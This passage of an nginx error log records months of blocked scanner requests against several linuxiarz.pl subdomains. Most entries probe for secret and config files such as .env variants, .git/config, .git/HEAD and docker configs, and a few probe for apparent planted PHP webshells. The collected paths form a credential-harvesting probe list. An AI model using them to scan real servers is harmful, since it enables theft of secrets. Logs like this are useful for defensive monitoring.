HTTP/1.1", host: "nginx.linuxiarz.pl" +2022/10/21 07:48:15 [error] 15352#15352: *149249 access forbidden by rule, client: 52.66.226.54, server: nginx.linuxiarz.pl, request: "GET /mailer/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2022/10/21 07:48:16 [error] 15352#15352: *149249 access forbidden by rule, client: 52.66.226.54, server: nginx.linuxiarz.pl, request: "GET /twitter/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2022/10/21 07:48:17 [error] 15352#15352: *149249 access forbidden by rule, client: 52.66.226.54, server: nginx.linuxiarz.pl, request: "GET /.env.development.local HTTP/1.1", host: "nginx.linuxiarz.pl" +2022/10/21 07:50:39 [error] 15352#15352: *149439 access forbidden by rule, client: 52.66.226.54, server: pliki.linuxiarz.pl, request: "GET /.config/gatsby/config.json HTTP/1.1", host: "pliki.linuxiarz.pl" +2022/10/21 07:50:40 [error] 15352#15352: *149439 access forbidden by rule, client: 52.66.226.54, server: pliki.linuxiarz.pl, request: "GET /.cordova/config.json HTTP/1.1", host: "pliki.linuxiarz.pl" +2022/10/21 07:50:40 [error] 15352#15352: *149439 access forbidden by rule, client: 52.66.226.54, server: pliki.linuxiarz.pl, request: "GET /.deployment-config.json HTTP/1.1", host: "pliki.linuxiarz.pl" +2022/10/21 07:50:40 [error] 15352#15352: *149439 access forbidden by rule, client: 52.66.226.54, server: pliki.linuxiarz.pl, request: "GET /.docker/config.json HTTP/1.1", host: "pliki.linuxiarz.pl" +2022/10/21 07:50:41 [error] 15352#15352: *149439 access forbidden by rule, client: 52.66.226.54, server: pliki.linuxiarz.pl, request: "GET /.docker/daemon.json HTTP/1.1", host: "pliki.linuxiarz.pl" +2022/10/21 07:50:41 [error] 15352#15352: *149439 access forbidden by rule, client: 52.66.226.54, server: pliki.linuxiarz.pl, request: "GET /.jupyter/jupyter_notebook_config.json HTTP/1.1", host: "pliki.linuxiarz.pl" +2022/10/21 07:50:41 [error] 15352#15352: *149439 access forbidden by rule, client: 52.66.226.54, server: pliki.linuxiarz.pl, request: "GET /.lanproxy/config.json HTTP/1.1", host: "pliki.linuxiarz.pl" +2022/10/21 07:50:43 [error] 15352#15352: *149439 access forbidden by rule, client: 52.66.226.54, server: pliki.linuxiarz.pl, request: "GET /.env.bak HTTP/1.1", host: "pliki.linuxiarz.pl" +2022/10/21 07:50:44 [error] 15352#15352: *149439 access forbidden by rule, client: 52.66.226.54, server: pliki.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "pliki.linuxiarz.pl" +2022/10/21 07:50:45 [error] 15352#15352: *149439 access forbidden by rule, client: 52.66.226.54, server: pliki.linuxiarz.pl, request: "GET /.env.dist HTTP/1.1", host: "pliki.linuxiarz.pl" +2022/10/21 07:50:46 [error] 15352#15352: *149439 access forbidden by rule, client: 52.66.226.54, server: pliki.linuxiarz.pl, request: "GET /.env.dev HTTP/1.1", host: "pliki.linuxiarz.pl" +2022/10/21 07:50:46 [error] 15352#15352: *149439 access forbidden by rule, client: 52.66.226.54, server: pliki.linuxiarz.pl, request: "GET /.env.local HTTP/1.1", host: "pliki.linuxiarz.pl" +2022/10/21 07:50:47 [error] 15352#15352: *149439 access forbidden by rule, client: 52.66.226.54, server: pliki.linuxiarz.pl, request: "GET /public/.env HTTP/1.1", host: "pliki.linuxiarz.pl" +2022/10/21 07:50:48 [error] 15352#15352: *149439 access forbidden by rule, client: 52.66.226.54, server: pliki.linuxiarz.pl, request: "GET /laravel/.env HTTP/1.1", host: "pliki.linuxiarz.pl" +2022/10/21 07:50:48 [error] 15352#15352: *149439 access forbidden by rule, client: 52.66.226.54, server: pliki.linuxiarz.pl, request: "GET /laravel/core/.env HTTP/1.1", host: "pliki.linuxiarz.pl" +2022/10/21 07:50:48 [error] 15352#15352: *149439 access forbidden by rule, client: 52.66.226.54, server: pliki.linuxiarz.pl, request: "GET /beta/.env HTTP/1.1", host: "pliki.linuxiarz.pl" +2022/10/21 07:50:49 [error] 15352#15352: *149439 access forbidden by rule, client: 52.66.226.54, server: pliki.linuxiarz.pl, request: "GET /kyc/.env HTTP/1.1", host: "pliki.linuxiarz.pl" +2022/10/21 07:50:49 [error] 15352#15352: *149439 access forbidden by rule, client: 52.66.226.54, server: pliki.linuxiarz.pl, request: "GET /admin/.env HTTP/1.1", host: "pliki.linuxiarz.pl" +2022/10/21 07:50:49 [error] 15352#15352: *149439 access forbidden by rule, client: 52.66.226.54, server: pliki.linuxiarz.pl, request: "GET /prod/.env HTTP/1.1", host: "pliki.linuxiarz.pl" +2022/10/21 07:50:50 [error] 15352#15352: *149439 access forbidden by rule, client: 52.66.226.54, server: pliki.linuxiarz.pl, request: "GET /.env.backup HTTP/1.1", host: "pliki.linuxiarz.pl" +2022/10/21 07:50:51 [error] 15352#15352: *149439 access forbidden by rule, client: 52.66.226.54, server: pliki.linuxiarz.pl, request: "GET /.env.docker.dev HTTP/1.1", host: "pliki.linuxiarz.pl" +2022/10/21 07:50:52 [error] 15352#15352: *149439 access forbidden by rule, client: 52.66.226.54, server: pliki.linuxiarz.pl, request: "GET /.env.php HTTP/1.1", host: "pliki.linuxiarz.pl" +2022/10/21 07:50:52 [error] 15352#15352: *149439 access forbidden by rule, client: 52.66.226.54, server: pliki.linuxiarz.pl, request: "GET /.env.prod HTTP/1.1", host: "pliki.linuxiarz.pl" +2022/10/21 07:50:53 [error] 15352#15352: *149439 access forbidden by rule, client: 52.66.226.54, server: pliki.linuxiarz.pl, request: "GET /.env.production.local HTTP/1.1", host: "pliki.linuxiarz.pl" +2022/10/21 07:50:53 [error] 15352#15352: *149439 access forbidden by rule, client: 52.66.226.54, server: pliki.linuxiarz.pl, request: "GET /.env.sample.php HTTP/1.1", host: "pliki.linuxiarz.pl" +2022/10/21 07:50:54 [error] 15352#15352: *149439 access forbidden by rule, client: 52.66.226.54, server: pliki.linuxiarz.pl, request: "GET /.env.save HTTP/1.1", host: "pliki.linuxiarz.pl" +2022/10/21 07:50:54 [error] 15352#15352: *149439 access forbidden by rule, client: 52.66.226.54, server: pliki.linuxiarz.pl, request: "GET /.env.stage HTTP/1.1", host: "pliki.linuxiarz.pl" +2022/10/21 07:50:54 [error] 15352#15352: *149439 access forbidden by rule, client: 52.66.226.54, server: pliki.linuxiarz.pl, request: "GET /.env.test HTTP/1.1", host: "pliki.linuxiarz.pl" +2022/10/21 07:50:57 [error] 15352#15352: *149439 access forbidden by rule, client: 52.66.226.54, server: pliki.linuxiarz.pl, request: "GET /.env.test.localapi/.env HTTP/1.1", host: "pliki.linuxiarz.pl" +2022/10/21 07:50:57 [error] 15352#15352: *149439 access forbidden by rule, client: 52.66.226.54, server: pliki.linuxiarz.pl, request: "GET /.docker/.env HTTP/1.1", host: "pliki.linuxiarz.pl" +2022/10/21 07:50:58 [error] 15352#15352: *149439 access forbidden by rule, client: 52.66.226.54, server: pliki.linuxiarz.pl, request: "GET /.docker/laravel/app/.env HTTP/1.1", host: "pliki.linuxiarz.pl" +2022/10/21 07:50:58 [error] 15352#15352: *149439 access forbidden by rule, client: 52.66.226.54, server: pliki.linuxiarz.pl, request: "GET /.environment HTTP/1.1", host: "pliki.linuxiarz.pl" +2022/10/21 07:50:59 [error] 15352#15352: *149439 access forbidden by rule, client: 52.66.226.54, server: pliki.linuxiarz.pl, request: "GET /.envrc HTTP/1.1", host: "pliki.linuxiarz.pl" +2022/10/21 07:51:00 [error] 15352#15352: *149439 access forbidden by rule, client: 52.66.226.54, server: pliki.linuxiarz.pl, request: "GET /.envs HTTP/1.1", host: "pliki.linuxiarz.pl" +2022/10/21 07:51:00 [error] 15352#15352: *149439 access forbidden by rule, client: 52.66.226.54, server: pliki.linuxiarz.pl, request: "GET /.env~ HTTP/1.1", host: "pliki.linuxiarz.pl" +2022/10/21 07:51:01 [error] 15352#15352: *149439 access forbidden by rule, client: 52.66.226.54, server: pliki.linuxiarz.pl, request: "GET /.gitlab-ci/.env HTTP/1.1", host: "pliki.linuxiarz.pl" +2022/10/21 07:51:01 [error] 15352#15352: *149439 access forbidden by rule, client: 52.66.226.54, server: pliki.linuxiarz.pl, request: "GET /.vscode/.env HTTP/1.1", host: "pliki.linuxiarz.pl" +2022/10/21 07:51:01 [error] 15352#15352: *149439 access forbidden by rule, client: 52.66.226.54, server: pliki.linuxiarz.pl, request: "GET /mailer/.env HTTP/1.1", host: "pliki.linuxiarz.pl" +2022/10/21 07:51:02 [error] 15352#15352: *149439 access forbidden by rule, client: 52.66.226.54, server: pliki.linuxiarz.pl, request: "GET /twitter/.env HTTP/1.1", host: "pliki.linuxiarz.pl" +2022/10/21 07:51:02 [error] 15352#15352: *149439 access forbidden by rule, client: 52.66.226.54, server: pliki.linuxiarz.pl, request: "GET /.env.development.local HTTP/1.1", host: "pliki.linuxiarz.pl" +2022/10/22 03:29:55 [error] 15352#15352: *158492 access forbidden by rule, client: 3.90.148.40, server: kodi.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "kodi.linuxiarz.pl" +2022/10/22 03:30:08 [error] 15352#15352: *158495 access forbidden by rule, client: 3.90.148.40, server: kompilacje.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2022/10/22 03:37:28 [error] 15352#15352: *158524 access forbidden by rule, client: 3.90.148.40, server: nginx.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "nginx.linuxiarz.pl" +2022/10/23 23:25:08 [error] 15352#15352: *181563 access forbidden by rule, client: 3.86.11.57, server: kompilacje.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2022/10/26 03:33:00 [error] 15352#15352: *206510 access forbidden by rule, client: 54.159.20.212, server: kodi.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "kodi.linuxiarz.pl" +2022/10/26 03:47:46 [error] 15352#15352: *206569 access forbidden by rule, client: 54.159.20.212, server: pliki.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "pliki.linuxiarz.pl" +2022/10/27 01:28:47 [error] 947#947: *7683 access forbidden by rule, client: 54.159.20.212, server: kodi.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "kodi.linuxiarz.pl" +2022/10/27 01:29:04 [error] 947#947: *7690 access forbidden by rule, client: 54.159.20.212, server: kompilacje.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2022/10/27 01:37:59 [error] 947#947: *7724 access forbidden by rule, client: 35.175.209.67, server: kodi.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "kodi.linuxiarz.pl" +2022/10/27 01:38:21 [error] 947#947: *7725 access forbidden by rule, client: 35.175.209.67, server: kompilacje.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2022/11/02 00:20:46 [error] 630316#630316: *47384 connect() failed (111: Connection refused) while connecting to upstream, client: 85.221.200.165, server: rspamd.linuxiarz.pl, request: "GET / HTTP/2.0", upstream: "http://127.0.0.1:11334/", host: "rspamd.linuxiarz.pl" +2022/11/02 00:20:47 [error] 630316#630316: *47384 connect() failed (111: Connection refused) while connecting to upstream, client: 85.221.200.165, server: rspamd.linuxiarz.pl, request: "GET /favicon.ico HTTP/2.0", upstream: "http://127.0.0.1:11334/favicon.ico", host: "rspamd.linuxiarz.pl", referrer: "https://rspamd.linuxiarz.pl/" +2022/11/02 07:21:34 [error] 630316#630316: *49896 access forbidden by rule, client: 15.237.93.201, server: pliki.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "pliki.linuxiarz.pl" +2022/11/03 15:48:32 [error] 630316#630316: *65809 access forbidden by rule, client: 121.199.32.163, server: kompilacje.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2022/11/03 15:48:35 [error] 630316#630316: *65812 access forbidden by rule, client: 121.199.32.163, server: kompilacje.linuxiarz.pl, request: "GET /core/.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2022/11/07 00:50:31 [error] 630316#630316: *152795 access forbidden by rule, client: 121.199.32.163, server: nginx.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2022/11/07 00:50:34 [error] 630316#630316: *152798 access forbidden by rule, client: 121.199.32.163, server: nginx.linuxiarz.pl, request: "GET /core/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2022/11/08 16:37:17 [error] 630316#630316: *188624 access forbidden by rule, client: 121.199.32.163, server: pliki.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "pliki.linuxiarz.pl" +2022/11/08 16:37:22 [error] 630316#630316: *188627 access forbidden by rule, client: 121.199.32.163, server: pliki.linuxiarz.pl, request: "GET /core/.env HTTP/1.1", host: "pliki.linuxiarz.pl" +2022/11/11 16:14:35 [error] 630316#630316: *246047 access forbidden by rule, client: 54.149.245.100, server: kompilacje.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2022/11/16 23:33:31 [error] 630316#630316: *313685 access forbidden by rule, client: 3.72.74.40, server: kompilacje.linuxiarz.pl, request: "GET /Debian%208/nginx-1.9.6-pagespeed-vts-linuxiarz.pl/.git/HEAD HTTP/1.1", host: "kompilacje.linuxiarz.pl", referrer: "http://kompilacje.linuxiarz.pl/Debian%208/nginx-1.9.6-pagespeed-vts-linuxiarz.pl/.git/HEAD" +2022/11/16 23:33:44 [error] 630316#630316: *313695 access forbidden by rule, client: 3.72.74.40, server: kompilacje.linuxiarz.pl, request: "GET /.git/HEAD HTTP/1.1", host: "kompilacje.linuxiarz.pl", referrer: "http://kompilacje.linuxiarz.pl/.git/HEAD" +2022/11/16 23:34:06 [error] 630316#630316: *313697 access forbidden by rule, client: 3.72.74.40, server: kompilacje.linuxiarz.pl, request: "GET /Debian%208/.git/HEAD HTTP/1.1", host: "kompilacje.linuxiarz.pl", referrer: "http://kompilacje.linuxiarz.pl/Debian%208/.git/HEAD" +2022/11/18 09:06:52 [error] 630316#630316: *328905 access forbidden by rule, client: 18.195.96.149, server: kodi.linuxiarz.pl, request: "GET /kodi_19/.git/HEAD HTTP/1.1", host: "kodi.linuxiarz.pl" +2022/11/18 09:07:28 [error] 630316#630316: *328914 access forbidden by rule, client: 18.195.96.149, server: kodi.linuxiarz.pl, request: "GET /9.80/.git/HEAD HTTP/1.1", host: "kodi.linuxiarz.pl" +2022/11/21 23:51:07 [error] 630316#630316: *370118 access forbidden by rule, client: 3.121.212.242, server: nginx.linuxiarz.pl, request: "GET /.git/HEAD HTTP/1.1", host: "nginx.linuxiarz.pl", referrer: "http://nginx.linuxiarz.pl/.git/HEAD" +2022/11/23 06:29:04 [error] 630316#630316: *384067 access forbidden by rule, client: 185.81.158.132, server: kompilacje.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2022/11/25 04:19:24 [error] 630316#630316: *407855 access forbidden by rule, client: 141.255.167.186, server: nginx.linuxiarz.pl, request: "GET /.svn HTTP/1.1", host: "nginx.linuxiarz.pl" +2022/11/25 06:06:31 [error] 630316#630316: *408370 access forbidden by rule, client: 141.255.167.186, server: kodi.linuxiarz.pl, request: "GET /.svn HTTP/1.1", host: "kodi.linuxiarz.pl" +2022/11/26 09:24:29 [error] 630316#630316: *423190 access forbidden by rule, client: 141.255.167.186, server: kompilacje.linuxiarz.pl, request: "GET /.svn HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2022/11/27 19:19:32 [error] 630316#630316: *437934 access forbidden by rule, client: 3.120.193.160, server: nginx.linuxiarz.pl, request: "GET /.git/HEAD HTTP/1.1", host: "nginx.linuxiarz.pl" +2022/12/04 06:02:01 [error] 1227#1227: *56788 access forbidden by rule, client: 3.124.3.208, server: pliki.linuxiarz.pl, request: "GET /.git/HEAD HTTP/1.1", host: "pliki.linuxiarz.pl" +2022/12/04 06:02:38 [error] 1227#1227: *56798 access forbidden by rule, client: 3.124.3.208, server: pliki.linuxiarz.pl, request: "GET /07-2022/.git/HEAD HTTP/1.1", host: "pliki.linuxiarz.pl" +2022/12/11 15:31:24 [error] 1227#1227: *180950 connect() failed (111: Connection refused) while connecting to upstream, client: 85.221.253.119, server: rspamd.linuxiarz.pl, request: "GET /neighbours HTTP/2.0", upstream: "http://127.0.0.1:11334/neighbours", host: "rspamd.linuxiarz.pl", referrer: "https://rspamd.linuxiarz.pl/" +2022/12/11 15:31:24 [error] 1227#1227: *180950 connect() failed (111: Connection refused) while connecting to upstream, client: 85.221.253.119, server: rspamd.linuxiarz.pl, request: "GET /neighbours HTTP/2.0", upstream: "http://127.0.0.1:11334/neighbours", host: "rspamd.linuxiarz.pl", referrer: "https://rspamd.linuxiarz.pl/" +2022/12/16 03:28:37 [error] 1227#1227: *240225 access forbidden by rule, client: 5.75.178.125, server: kompilacje.linuxiarz.pl, request: "GET /wp-content/uploads/kaswara/fonts_icon/a57bze8931/.__a57bze8931.php HTTP/1.1", host: "kompilacje.linuxiarz.pl", referrer: "www.google.com" +2022/12/16 03:28:38 [error] 1227#1227: *240240 access forbidden by rule, client: 5.75.178.125, server: kompilacje.linuxiarz.pl, request: "GET /wp-content/uploads/typehub/custom/a57bze8931/.__a57bze8931.php HTTP/1.1", host: "kompilacje.linuxiarz.pl", referrer: "www.google.com" +2022/12/16 03:29:01 [error] 1227#1227: *240505 access forbidden by rule, client: 5.75.178.125, server: nginx.linuxiarz.pl, request: "GET /wp-content/uploads/kaswara/fonts_icon/a57bze8931/.__a57bze8931.php HTTP/1.1", host: "nginx.linuxiarz.pl", referrer: "www.google.com" +2022/12/16 03:29:03 [error] 1227#1227: *240517 access forbidden by rule, client: 5.75.178.125, server: nginx.linuxiarz.pl, request: "GET /wp-content/uploads/typehub/custom/a57bze8931/.__a57bze8931.php HTTP/1.1", host: "nginx.linuxiarz.pl", referrer: "www.google.com" +2022/12/16 03:29:30 [error] 1227#1227: *240821 access forbidden by rule, client: 5.75.178.125, server: pliki.linuxiarz.pl, request: "GET /wp-content/uploads/kaswara/fonts_icon/a57bze8931/.__a57bze8931.php HTTP/1.1", host: "pliki.linuxiarz.pl", referrer: "www.google.com" +2022/12/16 03:29:31 [error] 1227#1227: *240830 access forbidden by rule, client: 5.75.178.125, server: pliki.linuxiarz.pl, request: "GET /wp-content/uploads/typehub/custom/a57bze8931/.__a57bze8931.php HTTP/1.1", host: "pliki.linuxiarz.pl", referrer: "www.google.com" +2022/12/22 10:44:55 [error] 3136037#3136037: *32493 access forbidden by rule, client: 3.75.170.117, server: nginx.linuxiarz.pl, request: "GET /ubuntu/.git/HEAD HTTP/1.1", host: "nginx.linuxiarz.pl" +2022/12/22 10:45:18 [error] 3136037#3136037: *32507 access forbidden by rule, client: 3.75.170.117, server: nginx.linuxiarz.pl, request: "GET /opensuse/.git/HEAD HTTP/1.1", host: "nginx.linuxiarz.pl" +2022/12/22 10:45:40 [error] 3136037#3136037: *32508 access forbidden by rule, client: 3.75.170.117, server: nginx.linuxiarz.pl, request: "GET /gentoo/.git/HEAD HTTP/1.1", host: "nginx.linuxiarz.pl" +2022/12/22 10:46:07 [error] 3136037#3136037: *32509 access forbidden by rule, client: 3.75.170.117, server: nginx.linuxiarz.pl, request: "GET /debian/.git/HEAD HTTP/1.1", host: "nginx.linuxiarz.pl" +2022/12/22 10:46:27 [error] 3136037#3136037: *32528 access forbidden by rule, client: 3.75.170.117, server: nginx.linuxiarz.pl, request: "GET /archlinux/.git/HEAD HTTP/1.1", host: "nginx.linuxiarz.pl" +2022/12/22 10:46:56 [error] 3136037#3136037: *32529 access forbidden by rule, client: 3.75.170.117, server: nginx.linuxiarz.pl, request: "GET /FreeBSD/.git/HEAD HTTP/1.1", host: "nginx.linuxiarz.pl" +2022/12/27 13:37:09 [error] 3136037#3136037: *94482 access forbidden by rule, client: 20.244.25.29, server: pliki.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "pliki.linuxiarz.pl" +2022/12/27 13:37:09 [error] 3136037#3136037: *94483 access forbidden by rule, client: 20.244.25.29, server: nginx.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2022/12/30 04:49:38 [error] 3136037#3136037: *139200 access forbidden by rule, client: 184.168.97.129, server: nginx.linuxiarz.pl, request: "GET /.sts.php HTTP/2.0", host: "nginx.linuxiarz.pl" +2022/12/30 04:51:50 [error] 3136037#3136037: *139239 access forbidden by rule, client: 173.255.243.153, server: kompilacje.linuxiarz.pl, request: "GET /.sts.php HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2022/12/30 04:52:48 [error] 3136037#3136037: *139249 access forbidden by rule, client: 142.93.1.177, server: pliki.linuxiarz.pl, request: "GET /.sts.php HTTP/1.1", host: "pliki.linuxiarz.pl" +2023/01/02 09:10:28 [error] 3136037#3136037: *202176 access forbidden by rule, client: 95.214.52.156, server: pliki.linuxiarz.pl, request: "GET /.DS_Store HTTP/1.1", host: "pliki.linuxiarz.pl" +2023/01/02 09:10:29 [error] 3136037#3136037: *202178 access forbidden by rule, client: 185.220.101.51, server: nginx.linuxiarz.pl, request: "GET /.DS_Store HTTP/1.1", host: "nginx.linuxiarz.pl" +2023/01/02 09:10:29 [error] 3136037#3136037: *202179 access forbidden by rule, client: 185.220.101.50, server: pliki.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "pliki.linuxiarz.pl" +2023/01/02 09:10:30 [error] 3136037#3136037: *202183 access forbidden by rule, client: 23.137.251.61, server: kompilacje.linuxiarz.pl, request: "GET /.DS_Store HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2023/01/02 09:10:31 [error] 3136037#3136037: *202189 access forbidden by rule, client: 162.247.73.192, server: nginx.linuxiarz.pl, request: "GET /.DS_Store HTTP/1.1", host: "nginx.linuxiarz.pl" +2023/01/02 09:10:31 [error] 3136037#3136037: *202188 access forbidden by rule, client: 23.128.248.17, server: pliki.linuxiarz.pl, request: "GET /.DS_Store HTTP/1.1", host: "pliki.linuxiarz.pl" +2023/01/02 09:10:31 [error] 3136037#3136037: *202191 access forbidden by rule, client: 185.220.102.247, server: kompilacje.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2023/01/02 09:10:31 [error] 3136037#3136037: *202182 access forbidden by rule, client: 80.67.172.162, server: nginx.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "nginx.linuxiarz.pl" +2023/01/02 09:10:32 [error] 3136037#3136037: *202193 access forbidden by rule, client: 185.14.97.176, server: pliki.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "pliki.linuxiarz.pl", referrer: "http://pliki.linuxiarz.pl/.git/config" +2023/01/02 09:10:33 [error] 3136037#3136037: *202196 access forbidden by rule, client: 107.189.28.157, server: kompilacje.linuxiarz.pl, request: "GET /.DS_Store HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2023/01/02 09:10:33 [error] 3136037#3136037: *202199 access forbidden by rule, client: 109.70.100.25, server: nginx.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "nginx.linuxiarz.pl", referrer: "http://nginx.linuxiarz.pl/.git/config" +2023/01/02 09:10:35 [error] 3136037#3136037: *202200 access forbidden by rule, client: 109.70.100.82, server: kompilacje.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "kompilacje.linuxiarz.pl", referrer: "http://kompilacje.linuxiarz.pl/.git/config" +2023/01/08 10:22:59 [error] 3136037#3136037: *304190 access forbidden by rule, client: 164.92.155.72, server: pliki.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "pliki.linuxiarz.pl" +2023/01/08 10:22:59 [error] 3136037#3136037: *304194 access forbidden by rule, client: 164.92.155.72, server: pliki.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "pliki.linuxiarz.pl", referrer: "http://pliki.linuxiarz.pl/.git/config" +2023/01/08 10:23:01 [error] 3136037#3136037: *304197 access forbidden by rule, client: 164.92.155.72, server: kompilacje.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2023/01/08 10:23:02 [error] 3136037#3136037: *304200 access forbidden by rule, client: 164.92.155.72, server: kompilacje.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "kompilacje.linuxiarz.pl", referrer: "http://kompilacje.linuxiarz.pl/.git/config" +2023/01/08 10:23:02 [error] 3136037#3136037: *304201 access forbidden by rule, client: 164.92.155.72, server: nginx.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "nginx.linuxiarz.pl" +2023/01/08 10:23:02 [error] 3136037#3136037: *304204 access forbidden by rule, client: 164.92.155.72, server: nginx.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "nginx.linuxiarz.pl", referrer: "http://nginx.linuxiarz.pl/.git/config" +2023/01/09 13:30:45 [error] 3136037#3136037: *321458 access forbidden by rule, client: 38.242.151.164, server: nginx.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2023/01/10 08:56:08 [error] 3136037#3136037: *335751 access forbidden by rule, client: 38.242.151.164, server: pliki.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "pliki.linuxiarz.pl" +2023/01/28 07:44:19 [error] 3136037#3136037: *668742 access forbidden by rule, client: 3.124.3.208, server: kompilacje.linuxiarz.pl, request: "GET /Debian_8/nginx-1.9.7-pagespeed-vts-linuxiarz.pl/.git/HEAD HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2023/01/28 07:44:55 [error] 3136037#3136037: *668743 access forbidden by rule, client: 3.124.3.208, server: kompilacje.linuxiarz.pl, request: "GET /Debian_8/nginx-1.9.4-pagespeed/.git/HEAD HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2023/01/28 07:45:16 [error] 3136037#3136037: *668744 access forbidden by rule, client: 3.124.3.208, server: kompilacje.linuxiarz.pl, request: "GET /Debian_8/nginx-1.9.3-pagespeed/.git/HEAD HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2023/01/28 07:45:32 [error] 3136037#3136037: *668745 access forbidden by rule, client: 3.124.3.208, server: kompilacje.linuxiarz.pl, request: "GET /Debian%208/nginx-1.9.7-pagespeed-vts-linuxiarz.pl/.git/HEAD HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2023/01/28 07:45:46 [error] 3136037#3136037: *668747 access forbidden by rule, client: 3.124.3.208, server: kompilacje.linuxiarz.pl, request: "GET /Debian%208/nginx-1.9.4-pagespeed/.git/HEAD HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2023/01/28 07:46:01 [error] 3136037#3136037: *668748 access forbidden by rule, client: 3.124.3.208, server: kompilacje.linuxiarz.pl, request: "GET /Debian%208/nginx-1.9.3-pagespeed/.git/HEAD HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2023/01/28 07:46:26 [error] 3136037#3136037: *668749 access forbidden by rule, client: 3.124.3.208, server: kompilacje.linuxiarz.pl, request: "GET /Ubuntu%2015.04/nginx-1.8.0-ubuntu-pagespeed/.git/HEAD HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2023/01/28 07:47:01 [error] 3136037#3136037: *668757 access forbidden by rule, client: 3.124.3.208, server: kompilacje.linuxiarz.pl, request: "GET /Ubuntu%2015.04/nginx-1.6.2-ubuntu-pagespeed/.git/HEAD HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2023/01/31 22:02:28 [error] 3136037#3136037: *720713 access forbidden by rule, client: 79.124.59.150, server: kompilacje.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "kompilacje.linuxiarz.pl", referrer: "http://kompilacje.linuxiarz.pl/.env" +2023/02/01 05:40:47 [error] 3136037#3136037: *724616 access forbidden by rule, client: 79.124.59.150, server: nginx.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "nginx.linuxiarz.pl", referrer: "http://nginx.linuxiarz.pl/.env" +2023/02/01 07:36:30 [error] 3136037#3136037: *725597 access forbidden by rule, client: 79.124.59.150, server: pliki.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "pliki.linuxiarz.pl", referrer: "http://pliki.linuxiarz.pl/.env" +2023/02/09 13:07:57 [error] 3136037#3136037: *846005 access forbidden by rule, client: 3.72.74.40, server: pliki.linuxiarz.pl, request: "GET /02-2016/.git/HEAD HTTP/1.1", host: "pliki.linuxiarz.pl", referrer: "http://pliki.linuxiarz.pl/02-2016/.git/HEAD" +2023/02/09 13:08:28 [error] 3136037#3136037: *846008 access forbidden by rule, client: 3.72.74.40, server: pliki.linuxiarz.pl, request: "GET /.git/HEAD HTTP/1.1", host: "pliki.linuxiarz.pl", referrer: "http://pliki.linuxiarz.pl/.git/HEAD" +2023/02/22 05:29:17 [error] 3860623#3860623: *57384 access forbidden by rule, client: 164.92.155.72, server: pliki.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "pliki.linuxiarz.pl" +2023/02/22 05:29:17 [error] 3860623#3860623: *57387 access forbidden by rule, client: 164.92.155.72, server: pliki.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "pliki.linuxiarz.pl", referrer: "http://pliki.linuxiarz.pl/.git/config" +2023/02/22 05:29:20 [error] 3860623#3860623: *57390 access forbidden by rule, client: 164.92.155.72, server: kompilacje.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2023/02/22 05:29:20 [error] 3860623#3860623: *57393 access forbidden by rule, client: 164.92.155.72, server: kompilacje.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "kompilacje.linuxiarz.pl", referrer: "http://kompilacje.linuxiarz.pl/.git/config" +2023/02/22 05:29:21 [error] 3860623#3860623: *57394 access forbidden by rule, client: 164.92.155.72, server: nginx.linuxiarz.pl, request: "GET /.git/config 